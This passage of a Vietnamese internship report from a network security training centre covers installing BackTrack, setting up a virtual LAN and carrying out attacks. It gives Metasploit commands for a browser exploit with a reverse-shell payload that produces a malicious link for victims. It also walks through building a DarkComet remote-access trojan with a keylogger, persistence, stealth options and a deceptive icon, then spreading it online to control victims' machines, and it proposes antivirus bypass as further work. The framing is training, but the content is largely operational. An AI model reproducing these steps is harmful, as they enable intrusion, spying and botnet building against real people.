  • 15. Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập 15Trang Tạo một máy ảo mới và cho đĩa BackTrack vào Giao diện khởi động của BackTrack
  • 16. Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập 16Trang Gõ startx để vào chế độ đồ họa trong BackTrack Để cài đặt, click chọn vào file Install BackTrack trên màn hình Desktop
  • 17. Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập 17Trang Chọn ngôn ngữ, chọn Tiếp để tiếp tục Chọn múi giờ, chọn Tiếp để tiếp tục
  • 18. Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập 18Trang Chọn ngôn ngữ bàn phím, chọn Tiếp để tiếp tục Chọn phân vùng để cài, chọn Tiếp để tiếp tục
  • 19. Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập 19Trang Nhấn Cài đặt để bắt đầu cài Quá trình cài đã bắt đầu.
  • 20. Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập 20Trang Sau khi hoàn tất, chỉ việc khởi động lại là xong.
  • 21. Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập 21Trang IV. TRIỂN KHAI TRONG MÔI TRƯỜNG LAN 1. Triển khai trong môi trường LAN VMware Workstation chuẩn bị sẵn cho chúng ta 10 Switch ảo. Trong số đó, VMnet0, VMnet1 và VMnet8 được dùng để kết nối với một vài thiết bị đặc biệt khác như Virtual Bridge, Virtual NAT Device, DHCP Server. Trong khuôn khổ bài này, ta sẽ sử dụng VMnet0 để thiết lập mạng cho các máy ảo trong VMware. VMnet0 là một Switch ảo được kết nối với Bridge ảo để liên lạc ra ngoài mạng thật. Các máy tính ảo nếu được cấu hình card mạng kết nối vào VMnet0 thì có thể tham gia vào việc liên lạc, chia sẻ dữ liệu với các máy thật ở mạng ngoài. Nếu mạng ngoài chúng ta có kết nối với Router ADSL, có cấu hình cấp IP động trên Router thì các máy ảo sẽ nhận được IP từ Router như một máy tính thật. Mặc định, VMWare sẽ tự chọn card mạng trên máy thật mà có kết nối ra mạng ngoài. Tuy nhiên nếu máy các bạn có nhiều hơn 2 card mạng thật thì chúng ta có thể lựa chọn lại cho phù hợp bằng cách điều chỉnh trong Virtual Network Editor > tab Host Virtual Network Mapping> VMnet0. Để chỉ định máy ảo sử dụng Bridge ảo VMnet0, trong giao diện VMware, kích chuột phải vào tên máy ảo, chọn Setting…, trong tab Hardware, chọn mục Network Adapter, sau đó trong mục Network Connection, chọn tùy chọn Bridged. Làm tương tự với các máy ảo khác. Như vậy, sau khi cấu hình xong, các máy ảo được cấp địa chỉ IP như máy thật. Và do đó, các máy ảo thuộc về cùng một mạng LAN, và chung mạng LAN với cả máy thật đang chạy VMware.
  • 22. Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập 22Trang Mô hình mạng LAN được mô phỏng: 2. Thử nghiệm xâm nhập bằng Metasploit Trong Backtrack, chúng ta sử dụng công cụ Metasploit để thực hiện xâm nhập. Công cụ này có database rất lớn, về các lỗi tồn tại trên các hệ điều hành và cách tấn công. Để khởi động giao diện Console của Metasploit, trong Terminal, gõ msfconsole. Giao diện chương trình: Khi dấu nhắc trở thành msf> , chúng ta có thể sử dụng chương trình. Để sử dụng một module nào đó, chúng ta sử dụng cú pháp: use <Đường dẫn đến module> VD: khai thác lỗi ms12_004 use exploit/windows/browser/ms12_004_midi -> Enter Các thiết lập: set PAYLOAD windows/meterpreter/reverse_tcp set SRVHOST 192.168.0.126 set LHOST 192.168.0.126 exploit Switch PC1 PC2 PC3
  • 23. Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập 23Trang Sau khi exploit, Metasploit sẽ tạo một link chứa mã độc (http://192.168.0.126:8080/OXRIFK6vPY), chỉ cần nạn nhân click vào link thì mã độc sẽ được gửi sang máy nạn nhân và sau đó có thể chiếm quyền máy.
  • 24. Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập 24Trang V. XÂY DỰNG BONET BẰNG DARKCOMET 3. Giới thiệu DarkComet DarkComet là một công cụ quản trị từ xa (Remote Administrator Tool) miễn phí rất nổi tiếng, được tạo ra để điều khiển bất kì máy Microsoft Windows nào. DarkComet có khả năng điều khiển truy cập từ xa, quả lí tập tin, giám sát (keyloger, chụp ảnh màn hình, xem webcame,..), các chức năng mạng,.. Dự án DarkComet RAT đã phát hành bản chính thức cuối cùng là DarkComet RAT v5.4.1 Legacy vào ngày 1/10/2012. 4. Cài đặt DarkComet Dự án DarkComet RAT đã chính thức đóng vào tháng 6 năm 2012, các bản chính thức trên trang http://www.darkcomet-rat.com đã được gỡ xuống. Bản DarkComet dùng trong phần này là bản DarkComet Rat 5.3.1, được download từ http://www.mediafire.com/download/37bd1c0acbd2p6c/darkcomet+5.3.1.rar. Chạy DarkComet trên linux: Tải bản DarkComet về, giải nén vào thư mục darkcomet5.3.1RAT. Mở terminal, chuyển thư mục làm việc hiện hành về darkcomet5.3.1RAT. Dùng lệnh wine darkcomet để khởi động DarkComet: wine darkcomet Giao diện quản lí của DarkComet:
  • 25. Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập 25Trang Tạo cổng lắng nghe các kết nối từ nạn nhân: Vào DarkComet-RAT -> Listen to new port(+Listen) Điền cổng kết nối, cổng mặc định là 1604. Chọn Listen để xác nhận Ta có thể thêm cổng lắng nghe khác nếu muốn. Tạo trojan: Trojan có thể được tạo từ bất kì máy windows nào. Các bước tạo trojan: Download DarkComet Giải nén file DarkComet531RAT.zip vào thư mục DarkComet. Vào thư mục DarkComet, chạy file DarkComet.exe Vào DarkComet -> Server module: Chọn Minimalist nếu muốn dùng các tùy chọn mặc định Chọn Full Editor nếu muốn tùy chỉnh tất cả tùy chọn.
  • 26. Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập 26Trang Giao diện full editor: Các cài đặt: - Main settings Cài đặt password, server ID, profile name và tùy chọn bypass tường lửa - Network Settings Cài đặt IP và cổng lắng nghe của server.
  • 27. Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập 27Trang - Module Startup Tùy chọn trojan có khởi động cùng Windows hay không. - Install Message Tùy chọn có hiển thị hộp thoại thông báo khi nạn nhân chạy chương trình trojan hay không.
  • 28. Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập 28Trang Module Shield: Các tùy chọn giúp trojan ẩn mình. - Keylogger Tùy chọn ghi log bàn phím, địa chỉ tải log. - File Binder Tùy chọn đính kèm file khác. Với tùy chọn này, trojan có thể mang theo một hoặc nhiều file mã độc, cài đặt các file mã độc này khởi động cùng Windows.
  • 29. Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập 29Trang - Choose Icon Tùy chọn một icon giả để đánh lừa nạn nhân. - Stub Finalization Tùy chọn định dạng xuất file trojan (.exe, .com, .bat, .pif, .scr), tùy chọn cách nén file trojan và lưu các cài đặt để sử dụng lại. Sau khi đã cài đặt xong các tùy chọn, chọn Build The Stub và chọn nơi lưu để tạo trojan. Với trojan vừa được tạo, ta có thể phát tán lên internet. Khi một người dùng internet down trojan về và mở ra thì sẽ có kết nối về server, lúc đó dựa vào giao diện quản lí của DarkComet, ta có toàn quyền với máy của nạn nhân.
  • 30. Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập 30Trang Giao diện quản lí users: Giao diện điều khiển user:
  • 31. Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập 31Trang VI. HƯỚNG PHÁT TRIỂN Công nghệ thông tin là ngành đang phát triển rất mạnh ở Việt Nam. Theo số liệu từ “Sách trắng Công nghệ thông tin – Truyền thông 2013”, cả nước có trên 1300 trang thông tin điện tử, 420 trang mạng xã hội được cấp phép. Đi cùng với sự phát triển này là số lượng các máy chủ (server) phục vụ các trang mạng, máy tính để bàn (PC), máy tính xách tay (laptop) cũng tăng lên rất nhanh. Nếu không có các biện pháp bảo mật nghiêm ngặt thì đây là môi trường rất thuận lợi cho sự phát triển của botnet, zombie. Để tiếp tục phát triển và đáp ứng yêu cầu thực tế, đề tài này cần nghiêng cứu mở rộng theo các hướng: - Các phương pháp bypass các antivirus hiện tại - Các loại bot phổ biến và nguy hiểm khác - Các cách phát tán botnet - Các cách khai thác botnet - Các phương pháp hiệu quả để phòng chống trở thành zombie, botnet VII. KẾT LUẬN Với sự chỉ bảo và hướng dẫn của thầy Võ Đỗ Thắng, sự chỉ bảo nhiệt tình của các giảng viên và nhân viên của trung tâm cùng với sự nỗ lực làm việc của bản thân em, đề tài “Nghiên cứu triển khai mạng lưới zombie, botnet trên hệ thống mạng” của em đã được hoàn thành, nhưng vẫn còn một số yếu điểm. Những nội dung chính đã đạt được: - Cài đặt và sử dụng BackTrack 5.3 với giao diện đồ họa và giao diện dòng lệnh. - Sử dụng thành thạo phần mềm Metasploit khai thác các lỗi hệ điều hành, các lỗi phần mềm Microsoft Office, Internet Explorer, Adobe Reader xâm nhập thành công và toàn điều khiển từ xa máy nạn nhân - Cài đặt thành công DarkComet trên Windows và linux - Tạo bot bằng DarkComet với các tùy chọn - Phát tán thành công bot, bước đầu xây dựng mạng lưới botnet - Xâm nhập thành công và toàn quyền điều khiển máy nạn nhân thông qua DarkComet bot.
  • 32. Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập 32Trang VIII. TÀI LIỆU THAM KHẢO 1. “Tài liệu hướng dẫn và sử dụng backtrack 5 để khai thác lỗ hổng mạng tại trung tâm athena”, Trung tâm đào tạo Quản trị mạng & An ninh mạng Athena 2. Trung tâm đào tạo Quản trị mạng & An ninh mạng Athena, “Bảo mật mạng – Bí quyết và giải pháp” 3. Diễn đàn Athena, http://athena.edu.vn/forum/forum.php 4. http://www.arbornetworks.com/corporate/blog/5243-volumetric-with-a- capital-v 5. “Sách trắng Công nghệ thông tin – Truyền thông”, 2013, Bộ CNTT - TT